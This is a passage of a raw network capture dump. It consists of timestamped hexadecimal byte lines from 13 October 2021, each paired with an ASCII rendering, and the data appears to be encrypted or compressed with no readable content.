                                                                            2021-10-13 17:30:43 UTC25INData Raw: a1 a4 3f 16 c1 f1 cc aa d5 90 e4 b6 65 0b 39 6a a0 8b 20 8c 8e 2c 1a 9d 26 df 6c cf 47 85 13 b2 ee 2f e2 2c 8a 2c 4a 8c c1 94 90 e9 07 d9 48 c3 7f 9f b2 84 51 64 fc 82 2d 46 93 56 6b 2c 3b 91 d8 42 52 ac cf 3b a0 74 9c 59 4c d8 99 db bd 11 4b 3c e1 3d d9 39 45 e4 e7 18 de ed d3 c9 5f 9a fb 94 ce 92 ac 69 ee 60 99 db 0e 71 c5 e9 ae fc 26 16 d8 3b 53 dc ff 03 ec b5 d8 0b b9 12 76 d5 eb bb 21 13 fd ec b9 10 a7 ff ee 7e 41 56 d8 20 7a a7 92 08 78 59 cc 44 3a af b3 1e fb 2e c4 e9 fd 90 83 b5 66 11 4f 9e bf 14 02 10 06 88 90 8a 01 6a 35 e3 86 e8 06 4a 8a 88 f0 10 51 27 c8 82 8d 81 ac e8 4c 45 4c cd 64 1d 8b 4a d0 a2 42 ed 9c cc 77 93 00 f5 76 47 02 15 76 d0 2e e9 d9 d6 0d 27 b1 ac be 37 6e 2c 9d 86 53 c2 44 43 1d 9c be dd ba 81 a5 36 3c 9e 0c 4d fa 73 c2 ed ca
                                                                            Data Ascii: ?e9j ,&lG/,,JHQd-FVk,;BR;tYLK<=9E_i`q&;Sv!~AV zxYD:.fOj5JQ'LELdJBwvGv.'7n,SDC6<Ms
                                                                            2021-10-13 17:30:43 UTC27INData Raw: 70 26 ed 69 51 53 34 b6 af 7b ec 89 fe 9a 21 18 5c bd 71 72 b7 6b 7f d4 35 64 e0 79 89 d8 f2 ec 42 f9 27 63 77 8d 32 d1 83 39 a2 f6 7e d1 cf 20 10 45 ae fc 7c d1 d8 13 4b c7 03 ca cb 8a db 00 f9 f5 9b 53 8c c7 9d 24 43 75 9b 0a b2 56 96 35 4c 9c a6 66 f5 b0 5a bb 74 d1 79 8b 90 37 4c a9 84 51 1d d0 b2 1f 39 29 9b c7 de a2 fc 6e 0e 15 86 c3 7a e9 5a 9e 00 78 58 1f dd a8 66 ca 44 80 ab ad cd fa 93 69 2b 94 43 e9 90 35 e1 97 fe ac 15 a5 41 14 b1 4f 58 f6 16 19 c7 e7 15 ae 32 55 83 63 e5 fb 1a 57 6b b6 31 b5 f5 5f 03 8c e1 00 23 5e ae 18 85 07 27 80 44 a3 f9 5a f6 b9 27 3e 39 1a 5f cf d3 2d c2 6f 5b 36 eb 82 50 65 e4 39 c0 64 92 29 d6 75 b2 df ed 10 88 ec 29 f9 e9 9e 56 b7 d4 13 f9 b8 ea 0b 7b 6f 22 f2 e2 05 c5 e0 de 76 e3 01 10 8a d9 2b 62 ce 8e db 9a 46 a9
                                                                            Data Ascii: p&iQS4{!\qrk5dyB'cw29~ E|KS$CuV5LfZty7LQ9)nzZxXfDi+C5AOX2UcWk1_#^'DZ'>9_-o[6Pe9d)u)V{o"v+bF
                                                                            2021-10-13 17:30:43 UTC28INData Raw: cc 6d ce 59 82 10 85 60 3c f9 26 83 bb 6a ba 3f 94 94 d3 3e 5a 41 d4 f3 bf 85 97 4b 4c 55 99 32 5e 45 0d 47 22 33 97 05 e7 68 ad cf 30 a0 7f 92 4c 4b eb 80 c9 a6 08 5e 4f e7 11 d7 3a 47 e4 de 02 c9 fc de 78 44 8e e2 91 59 ad bd 72 f0 ea 76 d1 31 68 fc f7 bb e8 34 99 e6 30 42 c8 83 1d fc b8 c4 0f 31 1c 52 d1 e6 27 21 05 f5 ed e0 11 8b fe d9 64 5d 55 9e 1f 6e a9 b4 0d f9 71 cc 5f 25 b8 9d 0d d7 25 ce ca f8 80 55 ac 45 3a 50 8d ae 60 01 0b 19 a0 7d 8c 3c 60 35 e1 20 0c 1e 90 9a 38 8e 2a 64 34 d9 91 94 8b bb cb 9a 5e 63 d1 73 0f 2e 58 d1 a2 49 d6 c7 df 7b 83 39 aa 5c 56 04 7a 04 72 3f ef d9 c7 03 14 b6 a3 a9 ab 5a 33 8b 79 41 e3 5b 4c 1a 80 0a dd b6 a9 0c 25 2e 8b 0a 53 f7 e3 ff fd c4 8e 6a d5 8d 65 94 61 d3 b5 d2 06 97 2e fc 5d 7d c8 31 b2 0b ed 23 11 c7 26
                                                                            Data Ascii: mY`<&j?>ZAKLU2^EG"3h0LK^O:GxDYrv1h40B1R'!d]Unq_%%UE:P`}<`5 8*d4^cs.XI{9\Vzr?Z3yA[L%.Sjea.]}1#&
                                                                            2021-10-13 17:30:43 UTC29INData Raw: 75 e5 72 5a dd ec ca 45 e9 17 5f 6e 8c 38 d6 83 14 a9 04 02 f9 cc 31 15 7c 98 ec 5f b4 e3 1f 5a c2 08 f9 d1 33 24 12 f6 fd 9b 7e bd bc b6 25 49 6c 8f 39 d2 67 41 26 49 9c a7 67 3e a3 02 81 30 fd 78 8a 89 20 6b a7 cb cd 32 c6 a3 1b 02 10 8b e2 cb 89 fc 43 77 16 c7 eb 68 d1 76 95 73 5d 51 3f d9 3b 40 db 22 0e 8a c2 ef f8 82 6f 57 ae 53 ce b2 4f fe 96 f4 8e 6a f5 41 12 9f 72 4e e7 04 67 af ef 3d f4 21 7d 82 61 f1 ed 5e 1b 51 b7 31 bf 2b 53 32 ea 96 24 32 78 c1 4f 85 07 dd 63 1a 81 b6 43 f1 b9 4e 3c e8 9d aa de f6 04 e6 7c 4a 2e e9 b8 7f 31 c7 39 ca ba 92 2e fc 53 d8 c5 b9 0f 89 ee 23 d1 c9 2b 56 bd d0 1a ee bb ea d8 14 76 23 e3 e8 29 d7 f1 da 67 f0 05 08 a2 88 dc 62 c8 9d fd 47 ec a9 76 cd b3 a0 f5 a4 84 61 e2 18 e0 ef 89 b4 09 a8 22 8b d7 5c 65 50 aa 89 43
                                                                            Data Ascii: urZE_n81|_Z3$~%Il9gA&Ig>0x k2Cwhvs]Q?;@"oWSOjArNg=!}a^Q1+S2$2xOcCN<|J.19.S#+Vv#)gbGva"\ePC
                                                                            2021-10-13 17:30:43 UTC31INData Raw: 85 86 45 7b fb 67 33 78 60 46 4b 3a a9 b9 d0 97 bc 52 d0 26 a0 77 83 5b 50 dc 8a 34 a7 37 dd c2 e0 11 c3 eb d5 ef cf 08 f7 f9 d9 da 5f ad e9 84 d5 94 a6 ff f6 48 67 db 31 6f fc f0 b9 fb 04 05 c9 30 48 6b 81 1b fa aa ee 94 92 0d 5f c7 52 aa 3b 10 f3 c1 6f 00 8b f4 f5 d7 41 48 17 25 fd 87 b8 1b 62 fb cc 54 3f a3 49 0c da 34 d8 f6 c4 01 57 a6 6b 18 dc 8a a4 14 12 1f 0d af 46 28 2d 67 2e ce bf bb 06 40 2e b5 f6 1c 6f 25 d9 96 88 81 3e f0 b2 44 61 c2 79 09 af 49 c6 3e 59 c9 dc d8 eb 84 24 b7 63 db 15 76 17 c6 b2 f2 c6 d6 05 83 b3 bb a9 0e d2 33 8b 72 74 f1 5e 52 03 97 87 c3 a4 9a 51 24 02 aa 19 76 d1 72 d3 fc dc ad e0 4f a5 7e 85 67 db 8e 97 73 85 24 fe 6e 30 17 3d a9 12 c9 0c a4 cf 49 de dd 6c 93 09 13 0e c3 c2 ca 31 c1 6f d2 93 a7 95 71 97 46 a6 c2 2b 0b 90
                                                                            Data Ascii: E{g3x`FK:R&w[P47_Hg1o0Hk_R;oAH%bT?I4WkF(-g.@.o%>DayI>Y$cv3rt^RQ$vrO~gs$n0=Il1oqF+
                                                                            2021-10-13 17:30:43 UTC32INData Raw: b8 ea 71 db c2 01 53 36 18 f7 c4 77 08 2b 8d 08 75 a3 b3 d8 b7 2e 4b 63 d4 8a a2 41 6e 24 55 86 a6 54 65 b0 5a 62 5a 9b 71 b4 f7 cc b1 47 9d 6a 19 c6 b0 2a 13 31 a7 c7 d4 a1 ae 62 61 18 91 cf 5b ff 76 97 17 86 51 13 d1 30 6a ca 0c 07 55 ac e1 f4 fc 52 44 89 46 9a d1 5b ff 9c f5 bf 31 f7 49 02 49 5d 60 e5 15 04 d7 e7 24 00 33 79 87 5b f5 d7 b9 73 69 d9 7d b4 f5 55 09 cc ba 23 30 6e ac 18 d0 07 d7 bf 59 8b 68 4b e0 bf bb 64 ef 9f 6c 31 d2 00 dd 7e 58 25 d2 dc 56 09 cd 14 c9 7d 9e 29 de 4f 0c 85 e9 02 8e 83 6d d0 c9 95 4e 8e fc 2c c4 a0 e6 0d 1c 61 dd f3 c4 2b cf fd da 6f e9 f9 09 8e 8c 32 48 d2 91 dc 4f fa 57 6f e0 b1 b7 e8 a4 8c 7a 1c 19 cc ed a0 b6 22 19 3f a3 d7 5c 90 4b 9a 8b bf 7d 5b 59 9d 13 05 12 7c 7f 99 7f ed 44 3f 21 23 a3 1c fd cd e5 a9 f6 eb 74
                                                                            Data Ascii: qS6w+u.KcAn$UTeZbZqGj*1ba[vQ0jURDF[1II]`$3y[si}U#0nYhKdl1~X%V})OmN,a+o2HOWoz"?\K}[Y|D?!#t
                                                                            2021-10-13 17:30:43 UTC33INData Raw: 19 8e 1c 2b 25 46 c2 e1 1c de 2d 4f 73 c6 1e dd 59 45 d3 4c 86 41 1b d3 84 b4 68 f6 60 7f db 22 6e e4 f2 21 4b 34 ce cc 5c 61 c9 90 10 ed b5 d2 68 ed 56 77 57 f0 bb 3a bc 7e cc 4e 9f 3c e3 25 70 70 43 0f 33 71 e5 0c 87 6a 73 dd 5f 25 a1 7d 1a d7 ac d5 e2 ec c8 55 a6 7c 26 c6 8d a4 1e 11 64 81 bb 6e 81 20 6e aa 51 8e 44 06 4a 8c 95 f6 27 44 37 d3 84 ef cd b2 df b8 3e 48 46 75 18 a9 5c be 3a 48 c5 c1 c2 7f 1b 9f 8f 8b 47 04 7a 3f db 06 c2 c9 cc 14 6c f5 b6 be 2c 0f 2a 82 f6 e5 38 42 cf bb 41 81 16 ac 57 22 0e 2e 81 1a 54 e7 65 c4 6a d3 92 75 c1 12 c0 08 68 cf a0 cf 7b 0b 99 d4 5e 71 16 37 a5 1b c8 aa b7 19 41 5a 19 ac 0e 01 03 02 c5 d7 57 89 17 76 53 39 71 8c 5c 9a 5d ab fe af 21 a9 1c 44 e0 1f 11 d1 9e 66 df 05 32 76 8a 96 8c 9d c8 57 c1 8d 99 10 a3 90 f6
                                                                            Data Ascii: +%F-OsYELAh`"n!K4\ahVwW:~N<%ppC3qjs_%}U|&dn nQDJ'D7>HFu\:HGz?l,*8BAW".Tejuh{^q7AZWvS9q\]!Df2vW
                                                                            2021-10-13 17:30:43 UTC34INData Raw: f5 4b 89 7c 34 9e 78 c3 87 47 06 30 97 ca 2e 82 1d 70 3c 5f 1c a5 c1 90 f0 18 a3 c9 11 a6 b1 78 bf 1f 60 be c5 4c ee a8 81 41 7e ea 93 25 8a ef c9 d6 ac aa 1a 13 cb fa 53 06 a5 15 1a b7 43 0f 05 17 66 8b 2a 84 b2 89 d5 93 58 d8 18 f4 4d 96 05 81 cf 2d ed 59 a0 37 55 bb 50 c2 bc e0 35 86 5a c5 78 96 82 19 fd 0b 44 99 32 5e 45 66 44 22 3f 93 d6 7b 46 a8 cc 3f b7 50 e3 4b 5f c9 94 e2 31 0e 46 c8 e9 7e 4f 3b 54 e5 dc 0d ce eb c8 de 43 94 f1 09 62 fd 14 72 f1 42 76 dc 26 72 e9 75 18 93 85 14 c9 3a 6a 92 91 10 e7 9d ff 1b ad 0b 59 ee c2 b8 30 0e ca e2 47 11 81 9b 67 75 50 49 1d 34 60 be a9 1c 75 48 da d1 92 dd e4 1f d7 2f c4 e4 83 fd 55 a6 67 1a 42 84 b5 1c 7c 59 19 bb 64 98 24 76 2d 89 fa bb 06 40 9f ab ec 00 16 61 d3 82 96 89 be ce bf 2b 36 d1 75 12 b0 51 0f
                                                                            Data Ascii: K|4xG0.p<_x`LA~%SCf*XM-Y7UP5ZxD2^EfD"?{F?PK_1F~O;TCbrBv&ru:jY0GguPI4`uH/UgB|Yd$v-@a+6uQ
                                                                            2021-10-13 17:30:43 UTC35INData Raw: 3f 41 95 61 76 a6 cb 71 d0 44 44 f7 b3 a7 51 b2 97 aa c7 44 98 c9 2a 12 31 a9 9c 6f 0f c0 0c 29 c3 78 eb 48 e3 49 31 6e 6e 1f 52 97 ac 01 31 b5 d4 c8 5a 32 e2 69 01 28 3a ad a0 61 fd 87 33 7c 36 17 d9 ac 7e 5a ee 6a 7f cf 2d 7e 9c 02 5e cb f7 e2 20 94 0e 77 7c 80 31 d4 9a 32 d7 36 6c de c7 5e 87 6d ba f7 13 f9 ca 1e 50 db 1f a8 e0 5d 0d 19 e5 f2 9b 59 b5 d5 f3 03 48 66 94 0a b8 54 2f 0f 42 8d a9 60 2a bf e3 1c 5e d1 73 89 ab 55 4f b8 81 53 1d d7 a6 75 3a 30 9a cd c7 a6 fc 65 70 0d 91 d2 74 5e c1 f0 2c 79 50 35 d8 f6 7c db 01 70 cf ac cd f3 8b 0a 21 88 42 e3 46 84 f5 9f d2 a0 34 98 16 14 b7 56 90 ef 05 67 c1 ee 3d f4 18 55 84 6c f7 fc 74 74 20 b6 2b d0 f5 51 23 cc ba 23 21 5e a0 18 e2 72 d7 b5 1d 8b 68 5a ed 83 94 29 6e 97 74 cf 9e 2c d1 6d 5e 2f 89 f0 56
                                                                            Data Ascii: ?AavqDDQD*1o)xHI1nnR1Z2i(:a3|6~Zj-~^ w|126l^mP]YHfT/B`*^sUOSu:0ept^,yP5|p!BF4Vg=Ultt +Q##!^rhZ)nt,m^/V
                                                                            2021-10-13 17:30:43 UTC36INData Raw: 19 a1 d0 3c eb b5 03 e3 0c 6a 92 d6 23 48 a2 90 4d 0e 7d 80 22 80 ed c5 db 54 ba 3d 0c a4 bd dd b1 ce b1 07 a4 4e 1e 00 7f be 86 d4 8f b3 2f 1a 83 65 9e 72 c1 5e 91 04 bc c4 23 f3 d2 9a 1b 43 b2 1f 94 bd e0 3f 72 5b c2 7f 8a ad e6 4b 64 e7 b4 3f 4b 66 44 40 22 28 87 cc 66 bd ac e3 3a cd 35 83 4a 5b d0 9f d5 ab 1d 41 c2 f1 16 c1 c5 55 c3 cc 1e cc ea d9 cb 52 9a fa 79 d4 be bf 59 f4 70 06 24 dd 9b 93 89 ae fc 26 3c bc 31 42 c3 93 14 e8 9d 44 18 ad 0b 75 c6 f0 a0 00 0d e2 a2 47 11 8b a4 ff 75 41 55 04 31 6e b5 ba 60 37 59 dd 5b 0d 93 4d 1f dd 4a a3 e3 ec 8a 43 3c 45 79 50 8d ae 18 01 09 31 c3 6f 8b 27 4f 34 e7 ae b1 10 62 19 a4 fd 09 4d 24 d2 82 96 e7 e6 df b2 40 62 aa 20 18 a3 5b af d0 49 c5 c1 e6 0e 94 28 a5 58 45 da 63 08 c7 f8 e9 cc d3 18 2e 0e 69 b0 03
                                                                            Data Ascii: <j#HM}"T=N/er^#C?r[Kd?KfD@"(f:5J[AURyYp$&<1BDuGuAU1n`7Y[MJC<EyP1o'O4bM$@b [I(XEc.i
                                                                            2021-10-13 17:30:43 UTC38INData Raw: ae f9 7f 26 63 04 03 c5 06 8a 54 e3 4d 1b ca 52 1f 4e e7 12 0f 31 bf bb f2 59 32 e6 6f 34 3e 3b a7 aa 0e 82 86 28 46 21 10 75 cf 6c 5d 8b ea 7e de 33 79 e9 6b 30 d6 fc ee 59 fb 06 5f 59 8d 38 d6 bf 34 93 69 64 f6 7e 31 1f 6b a9 f9 6d df 45 a9 4c f9 23 ca c2 4f 04 05 e5 ff a1 75 b5 da 8d 2c d3 75 98 0a bb 4b 68 02 43 8d a9 62 2a b6 89 1e 6e d1 79 80 af 3a 5f bd 83 49 31 77 a3 1a 17 20 92 d0 02 b2 e5 73 69 18 8e 4d c7 e2 b9 8d 07 50 d1 3e d3 22 4b 5e da 11 b9 aa 33 ef 96 65 44 92 2d be 9a 5a f5 4a d4 a6 3d f6 51 14 b7 5e 4c 19 00 75 ac ec 33 fe 32 55 85 6b c7 f9 76 42 6b b6 31 e6 f5 5f 32 e4 05 22 23 58 a5 1f 9b 79 b4 bf 1d 8f 40 74 f4 b3 96 01 c1 95 74 c9 bc eb d0 7c 4c 23 81 9f 56 09 c3 4d 8d 64 92 28 dc 8b f8 83 e9 09 8e 83 74 d1 c9 95 8a bb fa 3b ee ba
                                                                            Data Ascii: &cTMRN1Y2o4>;(F!ul]~3yk0Y_Y84id~1kmEL#Ou,uKhCb*ny:_I1w siMP>"K^3eD-ZJ=Q^Lu32UkvBk1_2"#Xy@tt|L#VMd(t;
                                                                            2021-10-13 17:30:43 UTC39INData Raw: a0 91 16 2f da f1 dc ad ca bc 18 b7 4f 1e 73 10 a1 9d 2a 8e 9f 27 0b 85 4f cc 17 4f 4d 83 1e ad c3 3d ea 1c 98 37 02 bb 3f 95 eb e0 3f 4b 5d d0 7a b8 c6 96 4a 64 ed 88 37 4e 93 56 6b 36 3f 82 fb 74 40 ad c9 19 97 78 83 40 30 0f 99 ca ac 15 55 c7 e0 00 d2 27 aa ee e3 02 dd c5 53 db 55 8f e6 83 c8 81 b8 72 e0 4d 78 d7 dc 65 c1 f5 a6 ed 28 9a 7e 0f a0 c9 90 10 f2 bb c1 1d ad 1c 5a db 0e ba 1c 0d f4 c8 59 02 8e f4 ee 70 4e bd 0f 1f 77 93 63 04 6a 4a d8 5f 34 b7 52 14 29 24 f9 f7 ea 88 7d b8 6e 0e 57 a5 80 14 13 01 76 77 6e 8b 27 78 28 f5 ab bb 17 4f 93 ae 03 0e 49 25 db aa fc 99 b3 d9 dd d9 60 d1 7f 34 ae 40 da b1 4d c5 da cb 68 99 d6 ae 58 4f 0d 6d d8 dd 31 ee d9 c9 12 0e a7 a8 b0 d8 74 1f 82 40 c2 ee 4a 41 13 98 85 c9 bb 90 aa 3a 21 7f 1a 72 ea 65 5e e3 d5
                                                                            Data Ascii: /Os*'OOM=7??K]zJd7NVk6?t@x@0U'SUrMxe(~ZYpNwcjJ_4R)$}nWvwn'x(OI%`4@MhXOm1t@JA:!re^
                                                                            2021-10-13 17:30:43 UTC40INData Raw: 49 3a f3 60 4d dc 2b af bf 6b eb 1b 39 44 2d 1c 48 30 6f 52 a8 68 66 d9 2f 6a e3 4b 47 ca fd e4 51 78 b8 68 66 57 2f 0a 1f 1d b8 20 6c d2 cf 2e 10 65 ac ff f2 6c d4 11 80 e0 01 da c6 56 7e 84 f7 f7 8c 4f a2 cc 8c a9 62 66 9e 1a ae 49 48 a8 f4 9c a6 ff 98 7d 9b ec 48 07 f4 a1 83 33 4f b5 83 48 97 71 bc 0a cb 20 9f d1 cb b1 c5 7a 60 09 8d cb 66 d9 60 97 8e cf 41 3a 5d 9f bc e2 1c 1e ab a7 e5 6e 82 65 4e 98 44 ea 9d 4e f6 87 fb c9 a5 f6 41 12 d8 4a 4d e7 08 1b d3 fe 39 d6 ae 55 85 7a fd 22 67 51 43 81 31 b5 ff 4c 24 d8 b0 0b 1b 5e ae 12 5b 07 d1 95 1d 8b 69 4a f6 b3 90 29 b9 97 f1 14 d3 3d cb 7c 4a 25 e1 a1 53 09 fa 39 c0 64 b2 29 d6 44 f0 a8 cc 0d e6 25 23 d1 c3 89 65 bf c4 11 c6 2c ea 0d 1e 5e 64 f3 e8 23 d5 9e 42 67 f0 0d 1c b4 a0 b9 63 c8 97 b3 51 ed a9
                                                                            Data Ascii: I:`M+k9D-H0oRhf/jKGQxhfW/ l.elV~ObfIH}H3OHq z`f`A:]neNDNAJM9Uz"gQC1L$^[iJ)=|J%S9d)D%#e,^d#BgcQ
                                                                            2021-10-13 17:30:43 UTC41INData Raw: 41 6a cf 4d 97 10 b9 d7 14 5a 2c 9b 3d 7d ab 3f 95 b6 f3 3b 53 57 4f 40 80 85 96 5c 4c 78 98 32 5e 41 49 56 26 21 0c ec 6a 43 ac d9 19 26 79 83 40 73 cd 49 83 a6 0e 44 ea f4 11 d7 31 47 e8 e4 05 0f a7 d9 da 57 ad e1 87 d5 98 ae 75 e7 5b 6f a4 50 65 ed f1 bc f5 3a 06 c1 22 4b e1 f3 10 ed b3 5e 27 ad 0d 5e d5 f6 aa 36 20 b8 c5 47 1b 9d da f8 73 5b 9e 9e 37 71 b8 a9 12 6f 2a 4b 5e 25 b8 5e 15 c6 2f c7 cb c4 ef 56 a6 6b 26 c6 8c a4 1e 02 22 31 cb 6d 8b 2b 08 bc e7 ae b1 17 40 9e 8d d5 7e 66 34 d5 aa 0b 9b b3 d5 a3 6d 48 a3 76 18 a5 30 49 a3 48 cf da c4 65 bc 00 dc 77 47 02 52 99 d1 2e e9 db e5 3a 6b a1 b7 b8 49 ed 32 8b 72 43 e4 58 68 24 e2 95 cc bd a9 38 24 2e 8b 0a 77 c9 05 d0 f6 d3 ea e4 4e a5 7e 85 6b cb 8f ff 05 86 2e fa 6e e7 17 3d a9 12 e8 0c 78 cc 49
                                                                            Data Ascii: AjMZ,=}?;SWO@\Lx2^AIV&!jC&y@sID1GWu[oPe:"K^'^6 Gs[7qo*K^%^/Vk&"1m+@~f4mHv0IHewGR.:kI2rCXh$8$.wN~k.n=xI
                                                                            2021-10-13 17:30:43 UTC43INData Raw: 75 ef 0e 5d cb fd e5 56 f6 0f 78 76 8d 38 c6 92 36 b9 20 6d de cd 20 1f 6d ba d4 79 db cb 24 5f c8 19 d4 c6 5c 0d 09 f6 f7 8b 4f 94 d4 9c 34 4a 66 9e 7b bd 4c 51 30 50 87 9b 71 2c a7 8c 36 4e db 62 74 82 1f 5a b7 8b 68 80 c7 a3 10 0e 21 f0 11 fc a2 ec 62 6b 03 9b d0 7a d0 67 95 1f 74 ae 3e ff 3a 77 cf 2c af ab ad c7 75 ad 65 44 88 51 ec 85 57 ec 9c fe b7 37 e8 56 ea b6 70 45 df c2 0a d7 ef 22 e6 21 5f 85 61 fd eb 88 75 47 b5 29 a6 ff 5f 32 c6 a5 30 dd 5f 82 11 bd a4 d5 bf 1d 94 7c 49 fc b3 81 23 f0 8c 8a ce ff 21 c0 74 39 87 fb 91 5d 1a c0 26 dc 77 98 29 c7 5f ed 9d 3b 0e a5 e5 1b aa cb 9f 56 a2 ca 28 e4 bb fb 07 0b 62 dd f3 c4 38 d1 d9 7e 66 f0 0d 84 9d 88 2b 63 db 98 c3 52 ff a3 6e dd b9 bf f6 5a 85 4d f3 1e c8 4b 8a b4 03 24 1a 89 d7 5d 83 55 b5 9a ac
                                                                            Data Ascii: u]Vxv86 m my$_\O4Jf{LQ0Pq,6NbtZh!bkzgt>:w,ueDQW7VpE"!_auG)_20_|I#!t9]&w)_;V(b8~f+cRnZMK$]U
                                                                            2021-10-13 17:30:43 UTC44INData Raw: 3f 97 4a 6e e7 b1 0a 54 6d 5d 99 22 3f aa d2 7a 43 ad cf 31 b3 78 f6 3f 5f d6 83 ca a6 0f 5d f2 e4 11 5e 3a 54 ef ac 09 df fc c6 c6 7d 3e f5 87 df ba 33 71 f1 4e 4f fe 22 64 e7 f6 a6 d4 95 14 c9 36 49 ba 2a 10 ed bf d8 1f c2 de 5f c6 fa a8 3f 1e f1 cb 7f 5c 8a f4 ff 64 5f 52 00 a9 62 bc a9 1f 4b 68 dd 5f 2f 9f 48 27 e5 24 d5 e2 fd 84 26 2b 6c 0e 57 9e a3 ca 01 2e 31 8c 6e 8b 27 74 2c ce 96 bb 06 40 51 b1 fc 0f 65 25 d4 aa f0 99 b3 d9 dd c3 61 d1 73 35 a6 67 d3 a3 48 c5 da ca 5f 1e 29 af 7e 28 8a 7b 0e da 41 6f cb cc 18 37 14 b7 be 20 66 36 f5 eb 52 ee 40 52 0a 81 87 cb d4 09 ae 25 28 96 c1 4d f1 60 da ce 12 85 7c 4f b4 73 85 68 f1 c7 d4 72 83 41 76 47 70 10 2e a9 12 c6 35 09 e7 2b d7 ae 1e fd 83 14 04 da cd d2 2f c7 6a 23 8f 48 92 23 09 57 ad de a7 0b af
                                                                            Data Ascii: ?JnTm]"?zC1x?_]^:T}>3qNO"d6I*_?\d_RbKh_/H'$&+lW.1n't,@Qe%as5gH_)~({Ao7 f6R@R%(M`|OshrAvGp.5+/j#H#W
                                                                            2021-10-13 17:30:43 UTC45INData Raw: 23 fe 7c dd a4 94 5b c8 1f c8 cc 4d 04 02 fa df 10 5f a4 d5 f3 ae 48 66 98 33 05 4c 40 20 50 85 b2 79 3b 59 8d 27 57 af ea 8a 83 39 58 90 a5 40 19 cc b5 e4 10 51 b6 e2 c5 a6 c1 43 49 4e 86 c3 7a c1 7f 8e 0c 50 33 3c d3 2e 09 40 05 1f ad c2 55 f9 82 6f 55 8e 6a 5e 9a 5a f9 85 f6 b7 3b df ce 15 b7 56 61 a4 13 02 ff 60 3c fe 38 78 bf 61 ff d0 40 07 49 b4 31 b3 e6 52 32 c1 ab 25 4c 76 ac 18 83 16 da ae 17 e4 4c 58 f6 b5 81 24 fe 9f 1b e9 d1 2c d7 6d 47 0c c5 92 57 0f a8 13 c2 64 94 2f c7 58 9d 93 c4 0f 83 c4 0d d3 c9 99 45 b5 0e 34 cb 93 dd 0d 14 7c 30 fc c0 11 d7 f1 d0 b9 f0 16 04 b5 5e 38 6e d9 91 cd 54 d2 55 90 33 4c b1 f5 b3 52 72 f3 09 f1 fe 99 3a be 97 43 77 28 a3 96 7a aa 89 bf 4a 47 59 9d 13 05 8c 7c 76 1d 7e d5 5c 50 d8 22 a3 16 fc d9 20 4a 98 1e 6e
                                                                            Data Ascii: #|[M_Hf3L@ Py;Y'W9X@QCINzP3<.@UoUj^Z;Va`<8xa@I1R2%LvLX$,mGWd/XE4|0^8nTU3LRr:Cw(zJGY|v~\P" Jn
                                                                            2021-10-13 17:30:43 UTC47INData Raw: c3 93 a5 b0 0f 46 c8 8f 37 d5 3b 52 e9 e7 ae dc ed df b5 7f 87 f5 81 d3 99 63 67 d4 60 50 da 22 6e fe f2 dc de 2e 14 cf 3b 6a f1 90 10 e7 6b d2 1f 87 0c 4f c6 f0 bb 30 0e e2 36 be 11 9e ee ff 75 51 58 3e 30 71 e4 b8 1b 63 07 dd 5f 34 c1 f7 1f d7 2f df e4 92 ac 54 a6 69 26 46 8f a4 12 3b 58 1a bb 68 a3 35 65 24 e0 c1 7d 06 4a 86 7a f3 2a 4d 03 d3 82 96 96 9b e7 b2 44 6a 0f 75 1e dd 73 d0 a2 4c ed dc cc 77 93 00 fc 77 47 02 52 17 d2 2e e5 a5 0a 12 1f a8 69 b0 03 5d 04 8b 78 58 e3 62 79 0c 97 9c 12 bb 87 85 24 32 81 1b 5e e1 75 d3 ea f7 85 72 55 a5 74 95 61 d9 96 d7 6e c9 2e f2 5c 70 16 3c b8 33 c2 24 5c cf 49 d4 f0 18 92 18 66 be dc de d3 34 c7 00 f2 8f 59 90 75 8d 55 ad d2 99 7a 82 0f 72 c1 07 25 d0 98 09 50 05 32 6d 42 8b ad 8d d7 56 c1 87 95 29 9f 87 08
                                                                            Data Ascii: F7;Rcg`P"n.;jkO06uQX>0qc_4/Ti&F;Xh5e$}Jz*MDjusLwwGR.i]xXby$2^urUtan.\p<3$\If4YuUzr%P2mBV)
                                                                            2021-10-13 17:30:43 UTC48INData Raw: 0d ae 44 78 aa 43 8d a3 60 29 b6 84 21 30 58 78 8a 85 20 47 a9 8d 51 11 dc cc 93 10 31 9c d4 df b0 eb 73 69 10 e8 4a 71 d0 70 8c 0a 69 59 17 5c 29 66 c0 29 57 ba a6 e5 76 83 65 4e a4 7d f8 90 72 70 97 fe ac 10 c1 32 36 b5 5c 4a f4 0e 19 db fe 34 91 1a 57 85 76 e6 f0 67 7f 04 92 33 b5 f3 4e 2f dd b0 4c 05 5c ae 1e 94 0b ff 13 1e 8b 6e 35 dc b1 90 2f e9 86 78 a0 c4 2d d1 76 94 2b df b9 60 09 c7 33 d3 69 ba 11 d6 55 f8 5a c5 1e 81 fb f5 c2 c1 8e 5e ac c6 05 85 44 15 f2 3c db 20 f2 ee 5a 53 f0 da 6d f8 2f 56 a1 88 2d 4a 53 9d dc 4d c4 35 6e cc b9 88 71 a4 84 6b 8d ad e1 ef 81 db 8e a9 25 83 c0 33 18 51 aa 83 d0 c2 5a 59 97 00 00 3a d2 7e b4 78 b4 c2 51 d8 29 ab 07 d4 f0 7c be 99 1b 5c c9 1e f1 5a 7f 67 a2 55 6e 62 cf b4 16 98 52 be c0 fd 21 96 33 f0 b9 e0 55
                                                                            Data Ascii: DxC`)!0Xx GQ1siJqpiY\)f)WveN}rp26\J4Wvg3N/L\n5/x-v+`3iUZ^D< ZSm/V-JSM5nqk%3QZY:~xQ)|\ZgUnbR!3U
                                                                            2021-10-13 17:30:43 UTC49INData Raw: ae 1d d6 4a 67 dc 4d 4c ef fb a9 ed 38 05 da 5f 61 cb 90 16 82 91 d0 18 ab 1c 4b d7 e3 d4 15 0a e2 c3 28 37 89 f4 f9 64 44 6b b2 30 71 be d7 31 61 59 db 4e 21 a3 59 70 c0 24 d5 e8 fe 98 7d 60 6c 0e 5b a0 3d ca 1d 19 01 45 78 95 2d 67 3f 89 f9 bb 06 40 50 b5 f9 25 65 34 d2 aa 9c 9a b1 df 4e 44 cd 78 74 16 a3 5f d1 a2 4a c5 12 cf d4 e9 2a a1 74 47 04 7a 0c d0 b7 e1 b2 dd 11 11 a2 b7 be 26 6e 03 81 78 1a ef 4a 41 66 97 96 dd a4 91 22 0e 2e 81 1a 4d e7 62 d5 e0 c3 19 6d 49 b2 62 08 70 df be c1 ee 94 28 e5 50 ec 07 3b b9 15 5d 35 06 d4 5f 48 bf 1e 8e 1f 89 15 da c3 cf a2 d0 78 c3 98 c5 85 5b 85 5e bb 48 a0 25 9e 05 62 75 0e 21 cf 95 70 0a 14 34 78 90 93 14 b4 e6 49 cc 9b 05 10 a1 98 06 16 ed 45 42 cc 80 88 93 d5 ae 99 